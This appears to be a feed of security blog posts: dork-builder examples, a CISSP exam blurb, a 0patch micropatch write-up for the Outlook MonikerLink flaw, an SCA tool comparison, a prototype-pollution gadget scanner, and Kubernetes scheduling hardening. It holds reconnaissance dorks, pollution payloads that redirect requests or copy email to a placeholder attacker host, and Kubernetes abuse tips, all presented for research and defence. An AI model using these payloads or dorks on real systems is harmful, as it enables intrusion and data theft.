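For illustration, dorks produced with the builder might look like the following (targets are hypothetical):

# Google: exposed log or environment files on a target domain
site:example.com ext:log OR ext:env

# Shodan: MySQL services in a given country
product:"MySQL" port:3306 country:"BE"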

TODO

  • Add more useful dorks and categories
  • Fix some bugs
  • Add a search bar to search through the results
  • Might add some LLM models to build dorks

Notes

I have built some dorks myself and used public resources to gather others; here are a few:
- https://github.com/lothos612/shodan
- https://github.com/TakSec/google-dorks-bug-bounty

Warning

  • I am not responsible for any damage caused by using the tool


CISSP exam tips and tricks part two | Cyber Work Hacks

By: Infosec
15 March 2024 at 18:00

Infosec and Cyber Work Hacks are here to help you pass the CISSP exam. Today’s Hack is part two, so I encourage you to go back and listen to part one of Steve Spearman’s CISSP exam tips and tricks. In part two, I pass the mic to Spearman to give you his top five test-taking strategies for the CISSP. What’s the Sesame Street rule? How does the CISSP feel about absolutes? Keep it here, and you’ll find out in part two of this week’s Cyber Work Hack. 

1:30 - Look for absolutes in questions
3:17 - The Sesame Street principle 
4:45 - Watch for algebraic equations 
6:23 - Look for the "golden words"
7:38 - Change management is likely the answer
8:55 - Keep an eye on senior management and impact
10:19 - Think like a CISO
11:53 - Outro

About Infosec
Infosec’s mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec Skills to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQ’s security awareness training. Learn more at infosecinstitute.com.


Micropatches Released for Microsoft Outlook "MonikerLink" Remote Code Execution Vulnerability (CVE-2024-21413)

15 March 2024 at 15:06

 


In February 2024, still-supported Microsoft Outlook versions got an official patch for CVE-2024-21413, a vulnerability that allowed an attacker to execute arbitrary code on the user's computer when the user opened a malicious hyperlink in the attacker's email.

The vulnerability was discovered by Haifei Li of Check Point Research, who also wrote a detailed analysis. Haifei reported it as a bypass of an existing security mechanism, whereby Outlook refuses to open a file from a shared folder on the Internet (which could expose the user's NTLM credentials in the process). The bypass works by adding an exclamation mark ("!") and some arbitrary text to the end of the file path, which turns the link into a "Moniker link". When opening moniker links, Windows downloads the file, opens it and attempts to instantiate the COM object referenced by the text following the exclamation mark. An immediate result of this is that an SMB request is automatically sent to the remote (attacker's) server, revealing the user's NTLM credentials. An additional risk is that this could lead to arbitrary code execution.

 

Official Patch

Microsoft patched this issue by effectively cutting off "Moniker link" processing for Outlook email hyperlinks. They did this in an unusual way, however. In contrast to their typical approach - changing the source code and rebuilding the executable file - they ventured deep into "our" territory and hot-patched this issue with an in-memory patch. Hmm, why would they do that?

The answer lies in the fact that the behavior they wanted to change is implemented in ole32.dll, but this DLL is used by many applications and they didn't want to affect them all (some of them may rely on moniker links being processed). So what they did was use their Detours package to replace ole32.dll's MkParseDisplayName function (the one parsing moniker links) with an essentially empty function - but only in Outlook.
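Conceptually, such a Detours-based in-memory patch looks like the sketch below (an illustrative approximation, not Microsoft's actual code; it assumes the Detours headers and library are available):

#include <windows.h>
#include <objbase.h>
#include <detours.h>

// Pointer to the real ole32.dll function
static HRESULT (STDAPICALLTYPE *Real_MkParseDisplayName)(
    LPBC pbc, LPCOLESTR szUserName, ULONG *pchEaten, LPMONIKER *ppmk) = MkParseDisplayName;

// Replacement that refuses to parse any moniker display name
static HRESULT STDAPICALLTYPE Hook_MkParseDisplayName(
    LPBC pbc, LPCOLESTR szUserName, ULONG *pchEaten, LPMONIKER *ppmk)
{
    return E_FAIL; // moniker links are simply never resolved
}

void InstallHook(void)
{
    DetourTransactionBegin();
    DetourUpdateThread(GetCurrentThread());
    DetourAttach((PVOID *)&Real_MkParseDisplayName, Hook_MkParseDisplayName);
    DetourTransactionCommit();
}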


Our Micropatch

While still-supported Microsoft Office versions have received the official vendor fix for this vulnerability, Office 2010 and 2013 - which we have security-adopted - are also vulnerable. In order to protect our users, we have created our own micropatch for this vulnerability.

We could implement a logically identical patch to Microsoft's by patching ole32.dll and checking in the patch if the running process is outlook.exe - but since ole32.dll is a Windows system file, this would require creating a patch for all Windows versions and then porting the patch every time this file is updated by Windows updates in the future. Not ideal.

Instead, we decided to take a different route. When parsing the hyperlink, Outlook at some point calls the HlinkCreateFromString function, which then calls further into ole32.dll and eventually to MkParseDisplayName, which we wanted to cut off.

A quick detour (pun intended) of our own here: The HlinkCreateFromString documentation states the following:

[Never pass strings from a non-trusted source. When creating a hyperlink with HlinkCreateFromString, the pwzTarget parameter is passed to MkParseDisplayNameEx. This call is safe, but the less safe MkParseDisplayName will be called for the string under the following circumstances:

    Not a file or URL string.
    Does not contain a colon or forward slash.
    Less than 256 characters.

A pwzTarget string of the form "@progid!extra" will instantiate the object registered with the specified progid and, if it implements the IMoniker interface, invoke IMoniker::ParseDisplayName with the "extra" string. A malicious object could use this opportunity to run unexpected code. ]

This, we believe, is the reason why Microsoft categorized the flaw at hand as "remote code execution."

Okay, back to our patch. There exists a function very similar to HlinkCreateFromString called HlinkCreateFromMoniker. This function effectively does the same with a moniker as the former does with a string, but without ever calling MkParseDisplayName. Our patch now simply replaces the call to (unsafe) HlinkCreateFromString with a call to (safe) HlinkCreateFromMoniker using a moniker that it first creates from the hyperlink string. To minimize the impact, this is only done for "file://" URLs containing an exclamation mark.


Micropatch Availability

The micropatch was written for the following security-adopted versions of Office with all available updates installed:

  1. Microsoft Office 2013
  2. Microsoft Office 2010

This micropatch has already been distributed to, and applied on, all online 0patch Agents in PRO or Enterprise accounts (unless Enterprise group settings prevented that). 

Vulnerabilities like this one get discovered on a regular basis, and attackers know about them. If you're using Office 2010 or 2013, 0patch will make sure such vulnerabilities won't be exploited on your computers - and you won't even have to know or care about updating.

If you're new to 0patch, create a free account in 0patch Central, then install and register 0patch Agent from 0patch.com, and email [email protected] for a trial. Everything else will happen automatically. No computer reboot will be needed.

To learn more about 0patch, please visit our Help Center

We'd like to thank Haifei Li for sharing their analysis, which allowed us to create a micropatch and protect our users against this attack. We also encourage all security researchers to privately share their analyses with us for micropatching.

A Look at Software Composition Analysis

13 March 2024 at 23:00

Software Supply Chain as a factory assembly line

Background

At Doyensec, we specialize in performing white and gray box application security audits. So, in addition to dynamically testing applications, we typically audit our clients’ source code as well. This process is often software-assisted, with open source and off-the-shelf tools. Modern comprehensive versions of these tools offer the capabilities to detect the inclusion of vulnerable third-party libraries, commonly referred to as software composition analysis (SCA).

Finding the right tool

Three well-known tools in the SCA space are Snyk, Semgrep and Dependabot. The first two are stand-alone applications with cloud components, and the last is integrated directly into the GitHub(.com) environment. Since Security Automation is one of our core competencies, Doyensec has extensive experience with these tools, from writing custom detection rules for Semgrep, to assisting clients with selecting and deploying these types of tools in their SDLC processes. We have also previously published research into some of these, with regards to their Static Analysis Security Testing (SAST) capabilities. You can find those results here. After discussing this research directly with Semgrep, we were asked to perform an unbiased head-to-head comparison of the SCA functionality of these tools as well.

It’s time to ignore most of dependency alerts.

You will find the results of this latest analysis here on our research page. Included in that whitepaper, we describe the process taken to develop the testing corpus and our methodology. In short, the aim was to determine which tool could provide the most actionable and efficient results (i.e., high true positive rates), regardless of the false negative rates. This scenario was thought to be the optimal real-world scenario for most security teams, because most can’t afford to routinely spend hours or days chasing false positives. The person-hours required to triage low fidelity tools in the hopes of an occasional true positive are simply too costly for all but the largest teams in the most secure environments. Additionally, any attempts at implementing deployment blocking as a result of CI/CD testing are unlikely to tolerate more than a minimal amount of false positives.

False Positive Rate

More to Come

We hope you find the whitepaper comparing the tools informative and useful. Please follow our blog for more posts on current trends and topics in the world of application security. If you would like assistance with your application security projects, including security automation services, feel free to contact us at [email protected].

Unveiling the Server-Side Prototype Pollution Gadgets Scanner

16 February 2024 at 23:00

Introduction

Prototype pollution has recently emerged as a fashionable vulnerability within the realm of web security. This vulnerability occurs when an attacker exploits the nature of JavaScript’s prototype inheritance to modify a prototype of an object. By doing so, they can inject malicious code or alter an application to behave in unintended ways. This could potentially lead to sensitive information leakage, type confusion vulnerabilities, or even remote code execution, under certain conditions.

For those interested in diving deeper into the technicalities and impacts of prototype pollution, we recommend checking out PortSwigger’s comprehensive guide.

// Example of prototype pollution in a browser console
Object.prototype.isAdmin = true;
const user = {};
console.log(user.isAdmin); // Outputs: true

To fully understand the exploitation of this vulnerability, it’s crucial to know what “sources” and “gadgets” are.

  • Sources: A source in the context of prototype pollution refers to a piece of code that performs a recursive assignment without properly validating the objects involved. This action creates a pathway for attackers to modify the prototype of an object. The main sources of prototype pollution are:
    • Custom Code: This includes code written by developers that does not adequately check or sanitize user input before processing it. Such code can directly introduce vulnerabilities into an application.
    • Vulnerable Libraries: External libraries that contain vulnerabilities can also lead to prototype pollution. This often happens through recursive assignments that fail to validate the safety of the objects being merged or extended (a short demonstration follows after this list).
// Example of recursive assignment leading to prototype pollution
function merge(target, source) {
    for (let key in source) {
        if (typeof source[key] === 'object') {
            if (!target[key]) target[key] = {};
            merge(target[key], source[key]);
        } else {
            target[key] = source[key];
        }
    }
}
  • Gadgets: Gadgets refer to methods or pieces of code that exploit the prototype pollution vulnerability to achieve an attack. By manipulating the prototype of a base object, attackers can alter the application’s logic, gain unauthorized access, or execute arbitrary code, depending on the application’s structure and the nature of the polluted prototype.
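To make the source example above concrete, here is a minimal sketch showing how the recursive merge shown earlier can be abused to pollute Object.prototype (assuming the payload arrives as attacker-controlled JSON):

// Attacker-controlled JSON, e.g. the body of an HTTP request
const payload = JSON.parse('{"__proto__": {"isAdmin": true}}');

const config = {};
merge(config, payload); // recurses into config.__proto__, i.e. Object.prototype

const victim = {};
console.log(victim.isAdmin); // true -- every object now inherits the property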

State of the Art

Before diving into the specifics of our research, it’s crucial to understand the landscape of existing research on prototype pollution. This will help us identify the gaps in current methodologies and tools, and how our work aims to address them.

On the client side, there is a wealth of research and tools available. For sources, an excellent starting point is the compilation found on GitHub (client-side prototype pollution sources). As for gadgets, detailed exploration and exploitation techniques have been documented in various write-ups, such as this informative piece on InfoSec Writeups and PortSwigger’s own guide on client-side prototype pollution.

Additionally, there are tools designed to detect and exploit this vulnerability in an automated manner, both from the command line and within the browser. These include the PP-Finder CLI tool and DOM Invader, a feature of Burp Suite designed to uncover client-side prototype pollution.

However, the research and tooling landscape for server-side prototype pollution presents a different picture:

  • PortSwigger’s research provides a foundational understanding of server-side prototype pollution with various detection methodologies. However, a significant limitation is that some of these detection methods have become obsolete over time. More importantly, while it excels in identifying vulnerabilities, it does not extend to facilitating their real-world exploitation using gadgets. This gap indicates a need for tools that not only detect but also enable the practical exploitation of identified vulnerabilities.

  • On the other hand, YesWeHack’s guide introduces several intriguing gadgets, some of which have been incorporated into our plugin (below). Despite this valuable contribution, the guide occasionally ventures into hypothetical scenarios that may not always align with realistic application contexts. Moreover, it falls short of providing an automated approach for discovering gadgets in a black-box testing environment. This is crucial for comprehensive vulnerability assessments and exploitation in real-world settings.

This overview underscores the need for further innovation in server-side prototype pollution research, specifically in developing tools that not only detect but also exploit this vulnerability in a practical, automated manner.

About the Plugin

Following the insights previously discussed, we’ve developed a Burp Suite plugin for detecting gadgets in server-side prototype pollution: the Server-Side Prototype Pollution Gadgets Scanner, available at GitHub. This tool represents a novel approach in the realm of web security, focusing on the precise identification and exploitation of prototype pollution vulnerabilities.

The core functionality of this plugin is to take a JSON object from a request and systematically attempt to poison all possible fields with a predefined set of gadgets. For example, given a JSON object:

{
  "user": "example",
  "auth": false
}

The plugin would attempt various poisonings, such as:

{
  "user": {"__proto__": <polluted_object>},
  "auth": false
}

or:

{
  "user": "example",
  "auth": {"__proto__": <polluted_object>}
}

Our decision to create a new plugin, rather than relying solely on custom checks (bchecks) or the existing server-side prototype pollution scanner highlighted in PortSwigger’s blog, was driven by a practical necessity. These tools, while powerful in their detection capabilities, do not automatically revert the modifications made during the detection process. Given that some gadgets could adversely affect the system or alter application behavior, our plugin specifically addresses this issue by carefully removing the poisonings after their detection. This step is crucial to ensure that the exploitation process does not compromise the application’s functionality or stability. By taking this approach, we aim to provide a tool that not only identifies vulnerabilities but also maintains the integrity of the application by preventing potential disruptions caused by the exploitation activities.

Furthermore, all gadgets introduced by the plugin operate out-of-bounds (OOB). This design choice stems from the understanding that the source of pollution might be entirely separate from where a gadget is triggered within the application’s codebase. Therefore, the exploitation occurs asynchronously, relying on OOB techniques that wait for interaction. This method ensures that even if the polluted property is not immediately used, it can still be exploited, once the application interacts with the poisoned prototype. This showcases the versatility and depth of our scanning approach.

Plugin Screenshot

Methodology for Finding Gadgets

To discover gadgets capable of altering an application’s behavior, our approach involved a thorough examination of the documentation for common Node.js libraries. We focused on identifying optional parameters within these libraries that, when modified, could introduce security vulnerabilities or lead to unintended application behaviors. Part of our methodology also includes defining a standard format for describing each gadget within our plugin:

{
  "payload": {"<parameter>": "<URL>"},
  "description": "<Description>",
  "null_payload": {"<parameter>": {}}
}
  • Payload: Represents the actual payload used to exploit the vulnerability. The <URL> placeholder is where the URL of the collaborator is inserted.
  • Description: Provides a brief explanation of what the gadget does or what vulnerability it exploits.
  • Null_payload: Specifies the payload that should be used to revert the changes made by the payload, effectively “de-poisoning” the application to prevent any unintended behavior.

This format ensures a consistent and clear way to document and share gadgets among the security community, facilitating the identification, testing, and mitigation of prototype pollution vulnerabilities.

Axios Library

Axios is widely used for making HTTP requests. By examining the Axios documentation and request configuration options, we identified that certain parameters, such as baseURL and proxy, can be exploited for malicious purposes.

  • Vulnerable Code Example:
    app.get("/get-api-key", async (req, res) => {
      try {
          const instance = axios.create({baseURL: "https://doyensec.com"});
          const response = await instance.get("/?api-key=<API_KEY>");
          res.send(response.data); // response handling assumed for illustration
      } catch (error) { // the original snippet omitted the catch block required by try syntax
          res.status(500).send('500!');
      }
    });
    
  • Gadget Explanation: Manipulating the baseURL parameter allows for the redirection of HTTP requests to a domain controlled by an attacker, potentially facilitating Server-Side Request Forgery (SSRF) or data exfiltration. For the proxy parameter, the key to exploitation lies in the ability to suggest that outgoing HTTP requests could be rerouted through an attacker-controlled proxy. While Burp Collaborator itself does not support acting as a proxy to directly capture or manipulate these requests, the subtle fact that it can detect DNS lookups initiated by the application is crucial. The ability to observe the DNS requests to domains we control, triggered by poisoning the proxy configuration, indicates the application’s acceptance of this poisoned configuration. It highlights the potential vulnerability without the need to directly observe proxy traffic. This insight allows us to infer that with the correct setup (outside of Burp Collaborator), an actual proxy could be deployed to intercept and manipulate HTTP communications fully, demonstrating the vulnerability’s potential exploitability.

  • Gadget for Axios:
    {
      "payload": {"baseURL": "https://<URL>"},
      "description": "Modifies 'baseURL', leading to SSRF or sensitive data exposure in libraries like Axios.",
      "null_payload": {"baseURL": {}}
    },
    {
      "payload": {"proxy": {"protocol": "http", "host": "<URL>", "port": 80}},
      "description": "Sets a proxy to manipulate or intercept HTTP requests, potentially revealing sensitive info.",
      "null_payload": {"proxy": {}}
    }
    

Nodemailer Library

Nodemailer is another library we explored and is primarily used for sending emails. The Nodemailer documentation reveals that parameters like cc and bcc can be exploited to intercept email communications.

  • Vulnerable Code Example:
    // mailOptions (from, to, subject, etc.) is assumed to be built elsewhere,
    // typically merged from user-influenced input
    transporter.sendMail(mailOptions, (error, info) => {
      if (error) {
          res.status(500).send('500!');
      } else {
          res.send('200 OK');
      }
    });
    
  • Gadget Explanation: By adding ourselves as a cc or bcc recipient in the email configuration, we can potentially intercept all emails sent by the platform, gaining access to sensitive information or communication.

  • Gadget for Nodemailer:
    {
      "payload": {"cc": "email@<URL>"},
      "description": "Adds a CC address in email libraries, potentially intercepting all platform emails.",
      "null_payload": {"cc": {}}
    },
    {
      "payload": {"bcc": "email@<URL>"},
      "description": "Adds a BCC address in email libraries, similar to 'cc', for intercepting emails.",
      "null_payload": {"bcc": {}}
    }
    

Gadget Found

Our methodology emphasizes the importance of understanding library documentation and how optional parameters can be leveraged maliciously. We encourage the community to contribute by identifying and sharing new gadgets. Visit our GitHub repository for a comprehensive installation guide and to start using the tool.

Kubernetes Scheduling And Secure Design

17 January 2024 at 23:00

During testing activities, we usually analyze the design choices and context needs in order to suggest applicable remediations depending on the different Kubernetes deployment patterns.

Scheduling is often overlooked in Kubernetes designs. Typically, various mechanisms take precedence, including, but not limited to, Admission Controllers, Network Policies, and RBAC configurations.

Nevertheless, a compromised pod could allow attackers to move laterally to other tenants running on the same Kubernetes node. Pod-escaping techniques or shared storage systems could be exploited to achieve cross-tenant access despite the other security measures.

Having a security-oriented scheduling strategy can help to reduce the overall risk of workload compromise in a comprehensive security design. If critical workloads are separated at the scheduling decision, the blast radius of a compromised pod is reduced.

By doing so, lateral movements related to the shared node, from low-risk tasks to business-critical workloads, are prevented.

CloudsecTidbit
Attackers on a compromised Pod with nothing around

Kubernetes provides multiple mechanisms to achieve isolation-oriented designs like node tainting or affinity. Below, we describe the scheduling mechanisms offered by Kubernetes and highlight how they contribute to actionable risk reduction.

The following sections discuss the methods available to apply a scheduling strategy.

Mechanisms For Workloads Separation

As mentioned earlier, isolating tenant workloads from each other helps in reducing the impact of a compromised neighbor. That happens because all pods running on a certain node will belong to a single tenant. Consequently, an attacker capable of escaping from a container will only have access to the containers and the volumes mounted to that node.

Additionally, multiple applications with different authorization levels may lead to privileged pods sharing a node with pods that have PII data mounted or that carry a different security risk level.

1. nodeSelector

Among the constraints, it is the simplest one: it operates by simply specifying the target node labels inside the pod specification.

Example Pod Spec

apiVersion: v1
kind: Pod
metadata:
  name: nodeSelector-pod
spec:
  containers:
  - name: nginx
    image: nginx:latest
  nodeSelector:
    myLabel: myvalue

If multiple labels are specified, they are treated as required (AND logic), hence scheduling will happen only on nodes satisfying all of them.

While it is very useful in low-complexity environments, it can easily become a bottleneck, blocking scheduling if many selectors are specified and no node satisfies them.

Consequently, it requires good monitoring and dynamic management of the labels assigned to nodes if many constraints need to be applied.

2. nodeName

If the nodeName field in the spec is set, the kube-scheduler ignores the Pod and the kubelet on the named node attempts to run it.

In that sense, nodeName overrides other scheduling rules (e.g., nodeSelector, affinity, anti-affinity, etc.) since the scheduling decision is pre-defined.

Example Pod Spec

apiVersion: v1
kind: Pod
metadata:
  name: nginx
spec:
  containers:
  - name: nginx
    image: nginx:latest
  nodeName: node-critical-workload

Limitations:

  • The Pod will not run if the node in the spec is not running or if it is out of resources to host it
  • Cloud environments like AWS EKS come with non-predictable node names

Consequently, it requires a detailed management of the available nodes and allocated resources for each group of workloads since the scheduling is pre-defined.

Note: De facto, such an approach invalidates all the computational efficiency benefits of the scheduler, and it should only be applied to small, easy-to-manage groups of critical workloads.

3. Affinity & Anti-affinity

The NodeAffinity feature enables specifying rules for pod scheduling based on certain characteristics or labels of nodes. They can be used to ensure that pods are scheduled onto nodes meeting specific requirements (affinity rules) or to avoid scheduling pods in specific environments (anti-affinity rules).

Affinity and anti-affinity rules can be set as either “preferred” (soft) or “required” (hard):

  • preferredDuringSchedulingIgnoredDuringExecution indicates a soft rule. The scheduler will try to adhere to it but may not always do so, especially if adhering to the rule would make scheduling impossible or challenging.
  • requiredDuringSchedulingIgnoredDuringExecution indicates a hard rule. The scheduler will not schedule the pod unless the condition is met. This can leave a pod unscheduled (pending) if the condition isn’t met.

In particular, anti-affinity rules could be leveraged to protect critical workloads from sharing the Kubelet with non-critical ones. By doing so, the lack of computational optimization will not affect the entire node pool, but just a few instances that will contain business-critical units.

Example of node affinity

apiVersion: v1
kind: Pod
metadata:
  name: node-affinity-example
spec:
  affinity:
   nodeAffinity:
      preferredDuringSchedulingIgnoredDuringExecution:
       - weight: 1
         preference:
          matchExpressions:
          - key: net-segment
            operator: In
            values:
            -  segment-x
      requiredDuringSchedulingIgnoredDuringExecution:
        nodeSelectorTerms:
        - matchExpressions:
          - key: workloadtype
            operator: In
            values:
            - p0wload
            - p1wload
  containers:
  - name: node-affinity-example
    image: registry.k8s.io/pause:2.0

The node is preferred to be in a specific network segment by label and it is required to match either p0 or p1 workloadtype (custom strategy).

Multiple operators are available (https://kubernetes.io/docs/concepts/scheduling-eviction/assign-pod-node/#operators); NotIn and DoesNotExist are the ones used to obtain node anti-affinity behavior.

From a security standpoint, only hard rules that require the conditions to be respected matter. preferredDuringSchedulingIgnoredDuringExecution should be reserved for computational configurations that cannot affect the security posture of the cluster.

4. Inter-pod affinity and anti-affinity

Inter-pod affinity and anti-affinity can constrain which nodes pods can be scheduled on, based on the labels of pods already running on a given node.
As specified in Kubernetes documentation:

“Inter-pod affinity and anti-affinity rules take the form “this Pod should (or, in the case of anti-affinity, should not) run in an X if that X is already running one or more Pods that meet rule Y”, where X is a topology domain like node, rack, cloud provider zone or region, or similar and Y is the rule Kubernetes tries to satisfy.”

Example of anti-affinity

affinity:
  podAntiAffinity:
    requiredDuringSchedulingIgnoredDuringExecution:
    - labelSelector:
        matchExpressions:
        - key: app
          operator: In
          values:
          - testdatabase

In the podAntiAffinity case above, we will never see the pod running on a node where a testdatabase app is running.

It fits designs where it is desired to schedule some pods together or where the system must ensure that certain pods are never going to be scheduled together.

In particular, the inter-pod rules allow engineers to define additional constraints within the same execution context without further creating segmentation in terms of node groups. Nevertheless, complex affinity rules could create situations with pods stuck in pending status.

5. Taints and Tolerations

Taints are the opposite of node affinity properties since they allow a node to repel a set of pods not matching some tolerations.

Taints can be applied to a node to make it repel pods unless they explicitly tolerate the taints.

Tolerations are applied to pods and allow the scheduler to schedule them onto nodes with matching taints. It should be highlighted that while tolerations allow scheduling, the decision is not guaranteed.

Each taint also defines an effect: NoExecute (evicts running pods that do not tolerate it), NoSchedule (hard rule), PreferNoSchedule (soft rule).

The approach is ideal for environments where strong isolation of workloads is required. Moreover, it allows the creation of custom node selection rules that are not based solely on labels, and it leaves little flexibility.
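As a minimal sketch (node and taint names are illustrative), a node can be tainted by an administrator and critical pods can opt in with a matching toleration:

# kubectl taint nodes node-critical workloadtype=critical:NoSchedule

apiVersion: v1
kind: Pod
metadata:
  name: critical-pod
spec:
  containers:
  - name: app
    image: nginx:latest
  tolerations:
  - key: "workloadtype"
    operator: "Equal"
    value: "critical"
    effect: "NoSchedule"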

6. Pod topology spread constraints

You can use topology spread constraints to control how Pods are spread across your cluster among failure-domains such as regions, zones, nodes, and other user-defined topology domains. This can help to achieve high availability as well as efficient resource utilization.
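A minimal example (labels and values are illustrative) spreading replicas of a critical app evenly across zones:

apiVersion: v1
kind: Pod
metadata:
  name: spread-example
  labels:
    app: critical-app
spec:
  topologySpreadConstraints:
  - maxSkew: 1
    topologyKey: topology.kubernetes.io/zone
    whenUnsatisfiable: DoNotSchedule
    labelSelector:
      matchLabels:
        app: critical-app
  containers:
  - name: app
    image: registry.k8s.io/pause:2.0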

7. Not satisfied? Custom Scheduler To The Rescue

Kubernetes by default uses kube-scheduler, which follows its own set of criteria for scheduling pods. While the default scheduler is versatile and offers a lot of options, there might be specific security requirements that it does not know about. Writing a custom scheduler allows an organization to apply risk-based scheduling and avoid pairing privileged pods with pods processing or accessing sensitive data.

To create a custom scheduler, you would typically write a program that:

  • Watches for unscheduled pods
  • Implements a scheduling algorithm to decide on which node the pod should run
  • Communicates the decision to the Kubernetes API server.

Some examples of a custom scheduler that can be adapted for this can be found at the following GH repositories: kubernetes-sigs/scheduler-plugins or onuryilmaz/k8s-scheduler-example.
Additionally, a good presentation on crafting your own is Building a Kubernetes Scheduler using Custom Metrics - Mateo Burillo, Sysdig. As mentioned in the talk, this is not for the faint of heart because of the complexity involved, and you might be better off sticking with the default scheduler if you are not already planning to build one.

Offensive Tips: Scheduling policies are like magnets

As described, scheduling policies could be used to attract or repel pods into specific group of nodes.

As previously stated, a proper strategy reduces the blast radius of a compromised pod. Nevertheless, there are still some aspects to consider from the attacker's perspective.

In specific cases, the implemented mechanisms could be used either to:

  • Attract critical pods - A compromised node, or a role able to edit node metadata, could be abused to attract pods of interest to the attacker by manipulating the labels of a controlled node.
    • Carefully review roles and internal processes that could be abused to edit the metadata. Verify the possibility for internal threats to exploit the attraction by influencing or changing the labels and taints
  • Avoid rejection on critical nodes - If users are supposed to submit pod specs, or have indirect control over how they are dynamically structured, the scheduling sections could be abused. An attacker able to submit Pod Specs could use scheduling preferences to jump to a critical node.
    • Always review the scheduling strategy to find out the options allowing pods to land on nodes hosting critical workloads. Verify if the user-controlled flows allow adding them or if the logic could be abused by some internal flow
  • Prevent other workloads from being scheduled - In some cases, knowing or reversing the applied strategy could allow a privileged attacker to craft pods to block legit workloads at the scheduling decision.
    • Look for potential mix of labels usable to lock the scheduling on a node

Bonus Section: Node labels security
Normally, the kubelet will still be able to modify labels for a node, potentially allowing a compromised node to tamper with its own labels to trick the scheduler as described above.

A security measure can be applied with the NodeRestriction admission plugin. It denies label edits coming from the kubelet when the label uses the reserved node-restriction.kubernetes.io/ prefix.
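For example (node and label names are illustrative), an administrator can apply a restricted label that kubelets cannot tamper with, and critical workloads can then select it:

# kubectl label nodes node-critical node-restriction.kubernetes.io/critical-workload=true

apiVersion: v1
kind: Pod
metadata:
  name: pinned-critical-pod
spec:
  containers:
  - name: app
    image: registry.k8s.io/pause:2.0
  nodeSelector:
    node-restriction.kubernetes.io/critical-workload: "true"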

Wrap-up: Time to take the scheduling decision

Security-wise, dedicated nodes for each namespace/service would constitute the best setup. However, such a design would not exploit the Kubernetes capability to optimize computations.

The following examples represent some trade-off choices:

  • Isolate critical namespaces/workloads on their own node group
  • Reserve a node for critical pods of each namespace
  • Deploy a completely independent cluster for critical namespaces

The core concept for a successful approach is having a set of reserved nodes for critical namespaces/workloads.

Real world scenarios and complex designs require engineers to plan the fitting mix of mechanisms according to performance requirements and risk tolerance.

This decision starts with defining the workloads’ risk:

  • Different teams, different trust level
    It’s not uncommon for large organizations to have multiple teams deploying to the same cluster. Different teams might have different levels of trustworthiness, training or access. This diversity can introduce varying levels of risks.

  • Data being processed or stored
    Some pods may require mounting customer data or having persistent secrets to perform tasks. Sharing the node with less hardened workloads may expose that data to risk.

  • Exposed network services on the same node
    Any pod that exposes a network service increases its attack surface. Pods interacting with external-facing requests may suffer from this exposure and be more at risk of compromise.

  • Pod privileges and capabilities, or its assigned risk
    Some workloads may need privileges to work or may run code that by its nature processes potentially unsafe content or third-party vendor code. All these factors can contribute to increasing a workload’s assigned risk.

Once the set of risks within the environment has been identified, decide the isolation level for teams/data/network traffic/capabilities. Grouping them together when they are part of the same process could do the trick.

At that point, the number of workloads in each isolation group can be evaluated and addressed by mixing the scheduling strategies according to the size and complexity of each group.

Note: Simple environments should use simple strategies and avoid mixing too many mechanisms if few isolation groups and constraints are present.
